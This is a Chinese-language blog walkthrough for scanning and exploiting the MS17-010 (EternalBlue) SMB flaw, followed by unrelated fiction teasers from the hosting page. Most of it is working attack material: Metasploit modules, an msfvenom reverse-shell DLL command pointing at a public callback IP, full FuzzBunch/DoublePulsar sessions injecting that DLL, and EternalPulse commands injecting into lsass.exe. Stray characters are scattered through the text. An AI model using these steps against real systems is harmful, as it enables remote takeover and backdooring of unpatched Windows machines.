MS17-010

0x01 漏洞檢測

1)msf

msf 里有個模塊 auxiliary/scanner/smb/smb_ms17_010 可以進行 單IP / IP段 的 17010 監(jiān)測

image

2)工具

有很多監(jiān)測工具,自己挑順手的就行了

sharpSMBScan

公司大佬寫的

C:\Users\root\Desktop\>SharpSMBScan.exe -h
    馬賽克君
    IP : SharpSMBScan.exe 192.168.1.1
    IPS : SharpSMBScan.exe -CIP 192.168.1.1
image

Ladon

K8gege 寫的內(nèi)網(wǎng)信息搜集工具鳖粟,不只限于 17010

Ladon.exe 192.168.37.1/24 ScanType MS17010
image

0x02 漏洞利用

1)msf

msf多個模塊可以嘗試利用

exploit/windows/smb/ms17_010_eternalblue

優(yōu)點是不需要匿名管道莺琳,但容易造成藍屏

當前測試版本 windows server 2008 R2 x64

image

可以本地打到vps上

VPS:

開監(jiān)聽

image

本地:

LHOST 設置我們 vps 的 IP

image

看到我們 vps 彈回 meterpreter 后就把本地的掐掉钟沛,不然讓他繼續(xù)打可能就打藍屏了

image
image
auxiliary/admin/smb/ms17_010_command

執(zhí)行命令的模塊,優(yōu)點是不會藍屏掸哑,但是需要匿名管道( exploit/windows/smb/ms17_010_psexec 同這個模塊拴鸵,都需要匿名管道)

當前測試版本 windows server 2008 R2 x64

image

2)原生py

方程式工具吩跋,來自 NAS 武器庫,最穩(wěn)定窖认,需要 python 2.6 環(huán)境

當前測試版本 windows 7 sp1 x86

1. 生成后門文件

利用 msfvenom 生成 dll 文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.100.119.27 LPORT=12121 -f dll >17010.dll
image

2. 打開監(jiān)聽

選擇對應的payload開監(jiān)聽就完事兒了

image

3. 原生 py 打 17010

啟動原生 py 文件超凳,注意需要 python2.6 的環(huán)境

image

這里設置 target ip 設置為有漏洞的目標,我新建了一個項目耀态。

[?] Default Target IP Address [] : 192.168.37.5
[?] Default Callback IP Address [] : 192.168.37.4
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] :
[*] Checking D:\logs for projects
[!] Access Denied to 'D:\logs'! Choose a different log directory.

[?] Base Log directory [D:\logs] : C:\Users\root\Desktop\17010\17010\shadowbroker\windows\logs
[*] Checking C:\Users\root\Desktop\17010\17010\shadowbroker\windows\logs for projects
Index     Project
-----     -------
0         Create a New Project

[?] Project [0] : 0
[?] New Project Name : 17010
[?] Set target log directory to 'C:\Users\root\Desktop\17010\17010\shadowbroker\windows\logs\17010\z192.168.37.5'? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => 192.168.37.5
[+] Set CallbackIp => 192.168.37.4

[!] Redirection OFF
[+] Set LogDir => C:\Users\root\Desktop\17010\17010\shadowbroker\windows\logs\17010\z192.168.37.5
[+] Set Project => 17010

選擇 Eternalblue 模塊植入后門轮傍,一路回車

image

這里需要選擇對應的操作系統(tǒng),模式選擇 FB

[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] :


[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

又是一路的回車

image

利用 Doublepulsar 插件首装,進行 DLL 注入

image

也是一路回車创夜,幾個地方需要注意,選擇對應的就行了

RunDLL 設置我們用 msfvenom 生成的 DLL 文件仙逻,進行注入

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] :

[*]  Function :: Operation for backdoor to perform

   *0) OutputInstall     Only output the install shellcode to a binary file on disk.
    1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] : 2
[+] Set Function => RunDLL

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [] : C:\Users\root\Desktop\17010.dll
                    
[+] Set DllPayload => C:\Users\root\Desktop\17010.dll

一路回車以后驰吓,成功打回來

image
image

3)其他工具

EternalPulse

提取的原版py涧尿,項目地址:https://github.com/TolgaSEZER/EternalPulse

可打包傳到shell上執(zhí)行,然后利用跳板機自帶的解壓縮軟件解壓

"C:\Program Files\WinRAR\rar.exe" x c:\test\EternalPulse.rar c:\test

使用方法和原生py一樣

Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp 存在17010漏洞的IP --TargetPort 445 --Target WIN72K8R2

Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp 存在17010漏洞的IP --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload x64.dll --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60

我這里利用的一個正向的dll檬贰,開啟目標的6373端口

image

然后正向連接就行了

image
界面化工具

還有一些界面化的方程式工具姑廉,都是大同小異,利用 DLL 注入

image
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末翁涤,一起剝皮案震驚了整個濱河市桥言,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌葵礼,老刑警劉巖号阿,帶你破解...
    沈念sama閱讀 223,126評論 6 520
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異鸳粉,居然都是意外死亡扔涧,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,421評論 3 400
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門届谈,熙熙樓的掌柜王于貴愁眉苦臉地迎上來枯夜,“玉大人,你說我怎么就攤上這事艰山『ⅲ” “怎么了?”我有些...
    開封第一講書人閱讀 169,941評論 0 366
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵程剥,是天一觀的道長劝枣。 經(jīng)常有香客問我汤踏,道長织鲸,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 60,294評論 1 300
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任溪胶,我火速辦了婚禮搂擦,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘哗脖。我一直安慰自己瀑踢,他們只是感情好,可當我...
    茶點故事閱讀 69,295評論 6 398
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布才避。 她就那樣靜靜地躺著橱夭,像睡著了一般。 火紅的嫁衣襯著肌膚如雪桑逝。 梳的紋絲不亂的頭發(fā)上棘劣,一...
    開封第一講書人閱讀 52,874評論 1 314
  • 城市分裂傳說
    那天,我揣著相機與錄音楞遏,去河邊找鬼茬暇。 笑死首昔,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的糙俗。 我是一名探鬼主播勒奇,決...
    沈念sama閱讀 41,285評論 3 424
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼巧骚!你這毒婦竟也來了赊颠?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 40,249評論 0 277
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤网缝,失蹤者是張志新(化名)和其女友劉穎巨税,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體粉臊,經(jīng)...
    沈念sama閱讀 46,760評論 1 321
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡草添,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,840評論 3 343
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了扼仲。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片远寸。...
    茶點故事閱讀 40,973評論 1 354
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖屠凶,靈堂內(nèi)的尸體忽然破棺而出驰后,到底是詐尸還是另有隱情,我是刑警寧澤矗愧,帶...
    沈念sama閱讀 36,631評論 5 351
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布灶芝,位于F島的核電站,受9級特大地震影響唉韭,放射性物質(zhì)發(fā)生泄漏夜涕。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 42,315評論 3 336
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一属愤、第九天 我趴在偏房一處隱蔽的房頂上張望女器。 院中可真熱鬧,春花似錦住诸、人聲如沸驾胆。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,797評論 0 25
  • 一樁弒父案贱呐,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽丧诺。三九已至,卻和暖如春奄薇,著一層夾襖步出監(jiān)牢的瞬間驳阎,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,926評論 1 275
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留搞隐,地道東北人驹愚。 一個月前我還...
    沈念sama閱讀 49,431評論 3 379
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長得像劣纲,于是被迫代替她去往敵國和親逢捺。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 45,982評論 2 361

推薦閱讀更多精彩內(nèi)容